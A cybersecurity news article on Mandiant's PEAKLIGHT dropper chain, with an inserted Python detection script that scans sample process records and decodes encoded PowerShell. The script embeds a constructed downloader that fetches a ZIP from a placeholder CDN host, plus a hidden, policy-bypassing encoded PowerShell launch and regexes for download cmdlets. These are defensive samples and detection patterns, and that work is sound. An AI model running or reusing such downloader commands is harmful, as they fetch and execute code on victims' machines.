New PEAKLIGHT Dropper Deployed in Attacks Targeting Windows with Malicious Movie Downloads
Cybersecurity researchers have uncovered a previously undocumented dropper that serves as a launchpad for next-stage malware aimed at infecting Windows systems with information stealers and loaders.
“The memory-only dropper decrypts and executes a PowerShell-based downloader,” Mandiant, a subsidiary of Google, said. “This PowerShell-based downloader is being tracked as PEAKLIGHT.”
Some of the malware families distributed through this technique include Lumma Stealer, Hijack Loader (also known as DOILoader, IDAT Loader, or SHADOWLADDER), and CryptBot, all of which are advertised under the malware-as-a-service (MaaS) model.
The attack chain begins with a Windows shortcut (LNK) file that is delivered via drive-by download techniques, for example when users search for a movie on search engines. The LNK files are distributed inside ZIP archives disguised as pirated movies.
The LNK file points to a content delivery network (CDN) hosting an obfuscated, memory-only JavaScript dropper. The dropper in turn executes the PEAKLIGHT PowerShell downloader script on the host, which then reaches out to a command-and-control (C2) server to fetch additional payloads.
Mandiant said it identified different variants of the LNK files, some of which use asterisks (*) as wildcards to launch the legitimate mshta.exe binary, which then covertly runs malicious code (i.e., the dropper) fetched from a remote server. Because the shortcut target is written with wildcards rather than the literal binary name, a naive string match for "mshta.exe" in the LNK target will miss these variants; the resolved image in process telemetry is the more reliable place to look.
Similarly, the droppers have been found to embed both hex-encoded and Base64-encoded PowerShell payloads that are eventually unpacked to execute PEAKLIGHT, which is designed to deliver next-stage malware on a compromised system while also downloading a legitimate movie trailer, likely as a decoy.
“PEAKLIGHT is an obfuscated PowerShell-based downloader that is part of a multi-stage execution chain that checks for the presence of ZIP archives in hard-coded file paths,” Mandiant researchers Aaron Lee and Praveeth D'Souza said.

“If the archives do not exist, the downloader will reach out to a CDN site and download the remotely hosted archive file and save it to disk.”
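The chain described above (a wildcard LNK target that resolves to mshta.exe, a PowerShell child carrying a hex- or Base64-encoded downloader, and a downloader that checks hard-coded paths for a ZIP before fetching it from a CDN) leaves traces that endpoint telemetry can catch. The following Python script is an added example, not Mandiant's code and not the PEAKLIGHT sample: it runs simple heuristics over constructed process-creation records (trimmed Sysmon Event ID 1 fields), unwraps the encoded PowerShell argument, and matches the decoded script against the downloader behaviours the article describes. The hostname (`cdn.example.invalid`), the file paths, the particular wildcard pattern and the downloader script itself are all assumptions made for illustration.

```python
import base64
import binascii
import re

# Constructed stand-in for the downloader behaviour described above: test a
# hard-coded path for a ZIP, fetch it from a CDN if it is missing, then unpack it.
# Hypothetical host and paths; this is not the real PEAKLIGHT script.
DOWNLOADER_PS = (
    "if (-not (Test-Path 'C:\\Users\\Public\\L1.zip')) { "
    "Invoke-WebRequest 'https://cdn.example.invalid/L1.zip' "
    "-OutFile 'C:\\Users\\Public\\L1.zip' }; "
    "Expand-Archive 'C:\\Users\\Public\\L1.zip' -DestinationPath 'C:\\Users\\Public\\L1'"
)

# The two wrappings the article says the dropper embeds. PowerShell's
# -EncodedCommand expects Base64 of UTF-16LE text, so the Base64 form uses that.
HEX_PAYLOAD = binascii.hexlify(DOWNLOADER_PS.encode("utf-8")).decode("ascii")
B64_PAYLOAD = base64.b64encode(DOWNLOADER_PS.encode("utf-16le")).decode("ascii")

# Constructed process-creation records (trimmed Sysmon Event ID 1 fields).
SAMPLE_EVENTS = [
    {   # LNK variant: wildcard target that resolves to the genuine mshta.exe (assumed pattern)
        "image": r"C:\Windows\System32\mshta.exe",
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": r'"C:\Windows\Sys*\msh*.exe" https://cdn.example.invalid/stage1',
    },
    {   # mshta spawning PowerShell with the Base64-wrapped downloader
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent": r"C:\Windows\System32\mshta.exe",
        "cmdline": "powershell.exe -w hidden -ep bypass -enc " + B64_PAYLOAD,
    },
    {   # benign control record that must not trip any rule
        "image": r"C:\Windows\System32\notepad.exe",
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": r"notepad.exe C:\Users\user\notes.txt",
    },
]

WILDCARD_EXE = re.compile(r'[A-Za-z]:\\[^"\s]*\*[^"\s]*\.exe', re.I)
URL = re.compile(r"https?://\S+", re.I)
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
HEX_ONLY = re.compile(r"[0-9a-f]+", re.I)
DOWNLOADER_INDICATORS = {
    "zip-presence-check": re.compile(r"Test-Path\s+'[^']*\.zip'", re.I),
    "remote-download": re.compile(r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Start-BitsTransfer", re.I),
    "archive-extract": re.compile(r"Expand-Archive", re.I),
    "hard-coded-url": URL,
}


def decode_payload(blob: str) -> str:
    """Unwrap a hex- or Base64-encoded PowerShell payload back to script text."""
    # Hex is tried first; a Base64 blob made only of hex characters would be
    # misread here, which is acceptable for a triage heuristic.
    if len(blob) % 2 == 0 and HEX_ONLY.fullmatch(blob):
        return bytes.fromhex(blob).decode("utf-8", errors="replace")
    raw = base64.b64decode(blob, validate=True)
    # Try UTF-16LE first (what -EncodedCommand uses), then UTF-8; accept the
    # first decoding that yields plain printable ASCII.
    for codec in ("utf-16le", "utf-8"):
        try:
            text = raw.decode(codec)
        except UnicodeDecodeError:
            continue
        if text.isascii() and text.isprintable():
            return text
    return raw.decode("utf-8", errors="replace")


def downloader_indicators(script: str) -> list:
    """Names of the downloader behaviours found in decoded script text."""
    return [name for name, rx in DOWNLOADER_INDICATORS.items() if rx.search(script)]


def flag_event(event: dict) -> list:
    """Reasons a process-creation record resembles the LNK -> mshta -> PowerShell chain."""
    reasons = []
    image, parent, cmd = event["image"].lower(), event["parent"].lower(), event["cmdline"]
    if WILDCARD_EXE.search(cmd):
        reasons.append("wildcard-in-executable-path")
    if image.endswith("mshta.exe") and URL.search(cmd):
        reasons.append("mshta-with-remote-url")
    if image.endswith("mshta.exe") and parent.endswith("explorer.exe"):
        reasons.append("mshta-launched-from-shell")  # a double-clicked LNK lands here
    if image.endswith("powershell.exe") and parent.endswith("mshta.exe"):
        reasons.append("powershell-child-of-mshta")
    m = ENCODED_ARG.search(cmd)
    if m:
        reasons.append("encoded-command")
        try:
            decoded = decode_payload(m.group(1))
        except ValueError:  # binascii.Error is a subclass of ValueError
            decoded = ""
        reasons.extend("payload:" + name for name in downloader_indicators(decoded))
    return reasons


def triage(events: list) -> dict:
    """Map event index -> reasons, keeping only records that tripped a rule."""
    return {i: r for i, e in enumerate(events) if (r := flag_event(e))}


if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["image"], reasons)
```

The wildcard rule exists because the shortcut target never contains the literal string "mshta.exe"; the match has to be made either on the wildcard pattern itself or on the resolved image that process telemetry records. Decoding with UTF-16LE before UTF-8 mirrors how PowerShell interprets -EncodedCommand, so the downloader's Test-Path, download and Expand-Archive steps become visible to plain regex matching.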
The disclosure comes as Malwarebytes detailed a malvertising campaign that uses fake Google Search ads for Slack, the business communication platform, to direct users to bogus websites hosting malicious installers that ultimately deliver a remote access trojan named SectopRAT.